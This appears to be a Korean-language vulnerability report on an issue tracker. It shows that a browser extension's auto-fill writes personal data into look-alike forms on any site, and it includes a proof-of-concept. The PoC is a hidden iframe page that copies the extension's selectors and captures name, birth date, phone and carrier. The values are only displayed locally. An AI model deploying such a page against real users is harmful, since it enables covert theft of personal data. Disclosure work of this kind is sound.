
기타 사이트 취약점 #11

@Xvezda

Description

@Xvezda
Image

확장 프로그램을 활성화한 상태로 안전하지 않은 사이트에 접속하는 것만으로 개인정보가 유출될 수 있는 취약점이 존재합니다.

poc: https://xvezda.com/poc/auth-auto-fill

<!DOCTYPE html>
<!--
  Outer page of the proof of concept (title "poc").
  Its only content is an iframe that loads frame.html and is hidden by inline
  style, so a visitor sees an empty page. frame.html is presumably the second
  listing in this report (title "leak"); confirm against the hosted PoC.
  Review note for the extension: the report's claim is that auto-fill still
  acts on a form the user cannot see. A fill routine should check the page
  origin against an allowlist, and should not act in hidden frames or in
  frames embedded by another page.
-->
<html lang="ko">
  <head>
    <meta charset="UTF-8" />
    <title>poc</title>
    <!-- Asks crawlers not to index this page or follow its links. -->
    <meta name="robots" content="noindex,nofollow" />
  </head>
  <body>
    <!-- Hidden frame: display:none plus zero width, height and border keep it out of view. -->
    <iframe
      src="frame.html"
      style="display: none; width: 0; height: 0; border: 0"
    ></iframe>
  </body>
</html>
<!DOCTYPE html>
<!--
  Inner page of the proof of concept (title "leak").
  It reproduces the DOM shape that the selectors quoted in the comment below
  expect, and records any value that lands in those fields. The selectors are
  presumably copied from the extension's fill logic; confirm against the
  extension source.
  Nothing in this listing sends the values anywhere: they are kept in a page
  variable and shown with alert().
  Review note for the extension: a structural CSS match says nothing about
  which site is being filled. Any page can reproduce this markup, so the
  decision to fill has to rest on the page origin, not on the DOM.
-->
<html lang="ko">
  <head>
    <meta charset="UTF-8" />
    <title>leak</title>
    <!-- Asks crawlers not to index this page or follow its links. -->
    <meta name="robots" content="noindex,nofollow" />
  </head>
  <body>
    <!--
      Reference only (this block is an HTML comment and never executes).
      The seven *Query strings are the selectors the markup below is built to
      satisfy. The three querySelector lookups at the end (#name, #telno,
      #allAgree) have no matching element on this page.
    -->
    <!--
      var nameInputQuery = "#oacxEmbededContents > div:nth-child(2) > div > div.formLayout > section > form > div.tab-content > div:nth-child(1) > ul > li:nth-child(1) > div.ul-td > input[type=text]";
      var birthDate8DigitInputQuery = "#oacxEmbededContents > div:nth-child(2) > div > div.formLayout > section > form > div.tab-content > div:nth-child(1) > ul > li:nth-child(2) > div.ul-td > input";
      var birthDate6DigitInputQuery = "#oacxEmbededContents > div:nth-child(2) > div > div.formLayout > section > form > div.tab-content > div:nth-child(1) > ul > li.oacx-ssn > div.ul-td > input[type=text]:nth-child(1)";
      var phone1InputQuery = "#oacxEmbededContents > div:nth-child(2) > div > div.formLayout > section > form > div.tab-content > div:nth-child(1) > ul > li.none-telecom > div.ul-td > select:nth-child(2)";
      var phone2InputQuery = "#oacxEmbededContents > div:nth-child(2) > div > div.formLayout > section > form > div.tab-content > div:nth-child(1) > ul > li:nth-child(4) > div.ul-td > input";
      var carrierInputQuery = "#oacxEmbededContents > div:nth-child(2) > div > div.formLayout > section > form > div.tab-content > div:nth-child(1) > ul > li.telecom > div.ul-td > select.one-third.mr15";
      var agreeInputQuery = "#totalAgree";

      var nameInput = this.document.querySelector("#name");
      var phoneInput = this.document.querySelector("#telno");
      var agreeInput = this.document.querySelector("#allAgree");
    -->
    <script>
      // Collects field values. Each inline oninput/onchange handler in the
      // form below writes one property of this object.
      var leak = {};

      /**
       * Reports what the handlers captured, using alert().
       * Shows '[-] failed' when no handler has run (leak is still empty),
       * otherwise a '[+] success' summary of name, birth date, phone and carrier.
       * leak.birth6Digit is captured by the form but is not part of the summary.
       */
      function showMessage() {
        // An untouched object serializes to '{}', meaning nothing was filled.
        if (JSON.stringify(leak) === '{}') {
          alert('[-] failed');
          return;
        }
        // The ?. calls avoid a TypeError when a field was never written; that
        // line of the summary then reads 'undefined'.
        // The carrier code (S, K or L) is mapped to a display name through the
        // inline lookup object; an unknown code also yields undefined.
        alert(
          '[+] success\n' +
          'name: ' + leak.name + '\n' +
          'birth: ' + leak.birth8Digit?.replace(/(\d{4})(\d{2})(\d{2})/, '$1/$2/$3') + '\n' +
          'phone: ' + leak.phone1 + '-' + leak.phone2?.replace(/(\d{4})(\d{4})/, '$1-$2') + '\n' +
          'carrier: ' + {S:'SKT',K:'KT',L:'LGU+'}[leak.carrier]
        );
      }
    </script>
    <!--
      The nesting and child order below are significant: the selectors use
      child combinators and :nth-child, so every wrapper and placeholder
      element is there to make a selector match. Comments do not count as
      children for :nth-child.
    -->
    <div id="oacxEmbededContents">
      <!-- Empty first child, so the real container is div:nth-child(2). -->
      <div></div>
      <div>
        <div>
          <div class="formLayout">
            <section>
              <form>
                <div class="tab-content">
                  <div>
                    <ul>
                      <!-- nameInputQuery: first li, text input. -->
                      <li>
                        <div class="ul-td">
                          <input oninput="leak.name=this.value" type="text" placeholder="name input" />
                        </div>
                      </li>

                      <!-- birthDate8DigitInputQuery: second li. -->
                      <li>
                        <div class="ul-td">
                          <input oninput="leak.birth8Digit=this.value" placeholder="birth date 8-digit" />
                        </div>
                      </li>

                      <!--
                        birthDate6DigitInputQuery & rrnInputQuery: the first
                        input is recorded; the second (RRN back part) has no
                        handler, so its value is not recorded here.
                      -->
                      <li class="oacx-ssn">
                        <div class="ul-td">
                          <input oninput="leak.birth6Digit=this.value" type="text" placeholder="birth date 6-digit" />
                          <input type="text" placeholder="RRN back part" />
                        </div>
                      </li>

                      <!-- phone2InputQuery: must stay the fourth li to match li:nth-child(4). -->
                      <li>
                        <div class="ul-td">
                          <input oninput="leak.phone2=this.value" placeholder="phone middle digits" />
                        </div>
                      </li>

                      <!--
                        phone1InputQuery: the selector targets select:nth-child(2),
                        hence the empty first select as a placeholder.
                      -->
                      <li class="none-telecom">
                        <div class="ul-td">
                          <select></select>
                          <select onchange="leak.phone1=this.value">
                            <option value="010">010</option>
                            <option value="011">011</option>
                            <option value="016">016</option>
                            <option value="017">017</option>
                            <option value="018">018</option>
                            <option value="019">019</option>
                          </select>
                        </div>
                      </li>

                      <!-- carrierInputQuery: option values S, K, L are the codes showMessage() maps to names. -->
                      <li class="telecom">
                        <div class="ul-td">
                          <select onchange="leak.carrier=this.value" class="one-third mr15">
                            <option value="S">SKT</option>
                            <option value="K">KT</option>
                            <option value="L">LGU+</option>
                          </select>
                        </div>
                      </li>
                    </ul>
                  </div>
                </div>
              </form>
            </section>
          </div>
        </div>
      </div>
    </div>

    <!--
      agreeInputQuery: a change event on this checkbox calls showMessage().
      Presumably the extension ticks it after filling the other fields, which
      would make it the trigger for the summary; confirm against the extension
      source. The handlers on this page run only if events are dispatched on
      the fields; setting a value from script does not fire them by itself.
    -->
    <input id="totalAgree" type="checkbox" onchange="showMessage()" /> <label for="totalAgree">전체 동의</label>
  </body>
</html>

기타 사이트에 대한 지원을 중단하거나 별도의 화이트리스트를 만들어 운영하는 등의 검증 과정이 필요해 보입니다.
